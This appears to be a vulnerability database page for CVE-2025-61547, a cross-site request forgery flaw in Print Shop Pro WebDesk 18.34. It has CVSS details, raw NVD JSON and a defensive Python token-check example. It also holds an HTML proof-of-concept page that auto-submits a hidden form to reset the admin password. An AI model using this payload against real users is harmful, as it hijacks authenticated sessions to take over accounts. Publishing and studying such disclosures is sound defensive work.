Security Vulnerability Report
CVE-2025-61547 CVSS 6.8 MEDIUM

Published: 2026-01-08 17:15:49
Last Modified: 2026-02-10 18:16:20

Description

Cross-Site Request Forgery (CSRF) is present on all functions in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.76). The application does not implement proper CSRF tokens or other protective measures, allowing a remote attacker to trick authenticated users into unknowingly executing unintended actions within their session. This can lead to unauthorized data modification such as credential updates.
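The missing control described above is a synchronizer token bound to the user's session, checked on every state-changing request. The following is an added illustration of that check, not code from Print Shop Pro WebDesk or its vendor: the endpoint path and form field names are taken from the PoC later on this page, while the origin `https://webdesk.example`, the `Session` class and the `update_credentials` handler are assumptions made to keep the example self-contained. It also shows the two secondary defences that belong beside the token: an Origin/Referer allow-list and a `SameSite` session cookie.

```python
"""Synchronizer-token CSRF protection for a credential-update endpoint.

Added example; not the vendor's code. Endpoint path and field names follow
the page's PoC; everything else (origin, session model, handler) is assumed.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Constructed: the application's own origin, the only one allowed to POST.
ALLOWED_ORIGINS = {"https://webdesk.example"}


@dataclass
class Session:
    session_id: str
    user: str
    # Per-session secret. Tokens are derived from it, so a third-party page
    # that can only make the browser send cookies cannot compute them.
    csrf_secret: str = field(default_factory=lambda: secrets.token_hex(32))


def issue_csrf_token(session: Session) -> str:
    """Token the server embeds as a hidden field in every form it renders."""
    return hmac.new(session.csrf_secret.encode(), session.session_id.encode(),
                    hashlib.sha256).hexdigest()


def verify_csrf_token(session: Session, submitted: Optional[str]) -> bool:
    """Constant-time comparison against the token this session expects."""
    if not submitted:
        return False
    return hmac.compare_digest(issue_csrf_token(session), submitted)


def origin_allowed(headers: Dict[str, str]) -> bool:
    """Secondary check: browsers attach Origin to cross-site POSTs."""
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False  # assumed policy: reject when neither header is present
    return any(origin == o or origin.startswith(o + "/") for o in ALLOWED_ORIGINS)


def update_credentials(session: Session, headers: Dict[str, str],
                       form: Dict[str, str]) -> Tuple[int, str]:
    """Hypothetical handler for POST /WebDesk/api/user/updateCredentials."""
    if not verify_csrf_token(session, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    if not origin_allowed(headers):
        return 403, "request origin not allowed"
    if form.get("newPassword") != form.get("confirmPassword"):
        return 400, "passwords do not match"
    # ... verify currentPassword against the stored hash and persist the new one
    return 200, "credentials updated for " + session.user


def session_cookie(session: Session) -> str:
    """Set-Cookie value; SameSite=Lax keeps the cookie off cross-site POSTs."""
    return "sid=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % session.session_id


def demo() -> Dict[str, int]:
    """Runs the cases a defender wants to see and returns their status codes."""
    sess = Session(session_id=secrets.token_hex(16), user="admin")
    token = issue_csrf_token(sess)
    same_site = {"Origin": "https://webdesk.example"}
    cross_site = {"Origin": "https://attacker.example"}  # constructed
    creds = {"newPassword": "new-pass", "confirmPassword": "new-pass"}
    return {
        "legitimate": update_credentials(sess, same_site, dict(creds, csrf_token=token))[0],
        "forged_no_token": update_credentials(sess, cross_site, creds)[0],
        "forged_guessed_token": update_credentials(sess, cross_site, dict(creds, csrf_token="0" * 64))[0],
        "valid_token_cross_origin": update_credentials(sess, cross_site, dict(creds, csrf_token=token))[0],
    }


if __name__ == "__main__":
    for case, status in demo().items():
        print(case, status)
```

The token check alone closes the reported gap; the origin check and `SameSite` cookie are defence in depth for the case where a token leaks or a form is rendered without one. Note that the final case (valid token, wrong origin) is rejected by the origin check, which is why both layers are worth logging separately in a detection pipeline.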

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:* - VULNERABLE
Print Shop Pro WebDesk < 19.76
Print Shop Pro WebDesk 18.34 (known affected version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-61547 -->
<!-- Print Shop Pro WebDesk Credential Modification -->
<html>
<body>
  <h1>CVE-2025-61547 CSRF PoC</h1>
  <p>Print Shop Pro WebDesk v18.34 - Credential Update</p>
  <form action="https://target-server/WebDesk/api/user/updateCredentials" method="POST" id="csrfForm">
    <input type="hidden" name="username" value="admin" />
    <input type="hidden" name="newPassword" value="HackedPassword123" />
    <input type="hidden" name="confirmPassword" value="HackedPassword123" />
    <input type="hidden" name="currentPassword" value="[attacker-needs-victim-to-enter]" />
  </form>
  <script>
    // Auto-submit the form when page loads
    document.addEventListener('DOMContentLoaded', function() {
      document.getElementById('csrfForm').submit();
    });
  </script>
  <p>If you see this text, the CSRF attack failed.</p>
</body>
</html>
<!-- Alternative: Image-based GET request PoC -->
<!-- <img src="https://target-server/WebDesk/api/settings/modify?param=value" width="0" height="0" border="0"> -->

References

https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61547 (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61547", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:48.620", "lastModified": "2026-02-10T18:16:19.923", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) is present on all functions in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.76). The application does not implement proper CSRF tokens or other other protective measures, allowing a remote attacker to trick authenticated users into unknowingly executing unintended actions within their session. This can lead to unauthorized data modification such as credential updates."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:*", "matchCriteriaId": "88C72179-FF05-44F1-87A2-80179F38245D"}]}]}], "references": [{"url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61547", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}